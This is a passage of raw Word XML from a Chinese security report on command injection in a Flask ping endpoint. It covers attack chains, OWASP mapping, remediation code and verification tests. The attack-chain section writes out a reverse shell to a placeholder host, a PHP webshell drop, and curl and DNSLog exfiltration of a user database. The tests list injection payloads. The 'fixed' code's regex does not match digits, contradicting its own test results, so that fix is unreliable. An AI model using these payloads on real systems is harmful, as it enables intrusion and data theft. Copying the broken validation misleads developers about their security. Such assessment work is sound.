      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、攻击链分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击链 1：服务器沦陷链（最危险）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Step 1: POST /ping ip=127.0.0.1;whoami → root确认</w:t>
        <w:br/>
        <w:t>Step 2: POST /ping ip=127.0.0.1;ifconfig → 网络配置</w:t>
        <w:br/>
        <w:t>Step 3: POST /ping ip=127.0.0.1;bash -i&gt;&amp;/dev/tcp/ATK/4444 0&gt;&amp;1</w:t>
        <w:br/>
        <w:t xml:space="preserve">         → 反弹Shell → 交互式控制台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>风险等级：🔴 致命 — 仅需1个POST请求即可获得交互式Shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击链 2：WebShell持久化植入链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Step 1: 写入WebShell → echo '&lt;?php system($_GET["c"]);?&gt;' &gt; /var/www/html/s.php</w:t>
        <w:br/>
        <w:t>Step 2: 访问 → http://target/s.php?c=id</w:t>
        <w:br/>
        <w:t>Step 3: 持久控制 → WebShell不受重启影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>风险等级：🔴 高危 — 持久化后门难以清除。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击链 3：数据外带链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Step 1: cat data/users.db → 数据库</w:t>
        <w:br/>
        <w:t>Step 2: curl http://ATK/$(base64 -w0 users.db) → 外带</w:t>
        <w:br/>
        <w:t>Step 3: DNSLog隐蔽通道 → ping `whoami`.xxx.dnslog.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>风险等级：🔴 高危 — 全量数据可静默窃取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、OWASP Top 10 (2021) 映射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OWASP 类别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对应漏洞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A03: Injection（注入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-1~8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令注入，根本漏洞类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>A01: 访问控制失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=True后无沙箱限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>A04: 不安全设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f-string+shell=True设计缺陷</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>A05: 安全配置错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-6/7/8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>root运行权限过高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>A09: 日志监控不足</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令执行操作无日志记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、漏洞修复措施</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>针对上述8项命令注入漏洞，从核心机制和纵深防御两个维度实施修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 修复措施对照表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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>修复措施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对应漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>修复类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>R-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>列表传参 + 禁用shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-1~8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>核心修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>R-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP格式白名单校验: ^[\d.]+$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-1~8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>输入校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>R-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>友好错误提示 + 超时处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>健壮性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 修复前后代码对比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🔴 修复前（不安全）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>🟢 修复后（安全）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def ping():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ip = request.form.get('ip','')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # ⚠️ f-string + shell=True</w:t>
              <w:br/>
              <w:t xml:space="preserve">    cmd = f'ping -c 3 {ip}'</w:t>
              <w:br/>
              <w:t xml:space="preserve">    output = check_output(cmd, shell=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 任意命令可执行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def ping():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ip = request.form.get('ip','')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # ✅ IP格式白名单</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if not re.match(r'^[\\.d.]+$', ip):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return error</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # ✅ 列表传参，shell=False</w:t>
              <w:br/>
              <w:t xml:space="preserve">    cmd = ['ping', '-c', '3', ip]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    output = check_output(cmd, timeout=30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复原理：</w:t>
      </w:r>
      <w:r>
        <w:t>① 列表传参（shell=False）时，Python不会将参数传递给shell解析，而是直接作为单个参数传递给ping进程。即使ip中含有;id，也只会被当作ping的目标地址字符串，不会触发命令执行。② IP白名单拒绝非数字字符，在输入层阻断所有命令注入尝试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、修复验证测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复完成后对10个测试用例进行了全面黑盒验证，全部通过。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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>验证方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>预期结果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实际结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ping 127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正常响应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✅ 通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>分号注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=127.0.0.1;id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=127.0.0.1|id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>域名输入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=127.0.0.1;echo&gt;x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>字母输入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=abc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断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✅ 阻断通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ping网关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /ping ip=192.168.245.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正常响应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✅ 通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET页面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET /ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>显示表单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✅ 通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>TC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>原有登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>POST /login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录成功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✅ 通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击效果修复前后对比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攻击方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>修复前</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>修复后</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>分号注入 ;id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>uid=0(root)执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断 — 格式错误提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道注入 |id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断 — 格式错误提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件写入 &gt; /tmp/x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>写入成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断 — 格式错误提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反弹Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bash/python3/nc全部可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断 — 格式错误提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>信息收集 whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>root泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>阻断 — 格式错误提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正常Ping 127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3个包正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3个包正常 ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、综合结论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>▶ 漏洞发现：</w:t>
      </w:r>
      <w:r>
        <w:t>共发现8项命令注入漏洞（高危6项、中危2项）。根因为subprocess.check_output(..., shell=True)结合f-string拼接用户输入，三个漏洞要素同时满足。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>▶ 修复策略：</w:t>
      </w:r>
      <w:r>
        <w:t>R-1（列表传参+禁用shell=True）：Python将参数作为字符串直接传给进程，shell不参与解析，;id等字符失去特殊含义。R-2（IP白名单校验）：在输入层阻断所有非IP字符。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>▶ 修复验证：</w:t>
      </w:r>
      <w:r>
        <w:t>10项测试全部通过。所有命令注入攻击（分号/管道/命令替换/文件写入/反弹Shell）均被成功阻断，正常Ping功能完整保留。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>▶ 最终安全评级：</w:t>
      </w:r>
      <w:r>
        <w:t>8项漏洞全部修复。系统安全水位从「严重」提升至「安全」。（修复前：高危6项、中危2项；修复后：0项）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评估维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>修复前</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>修复后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变化</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
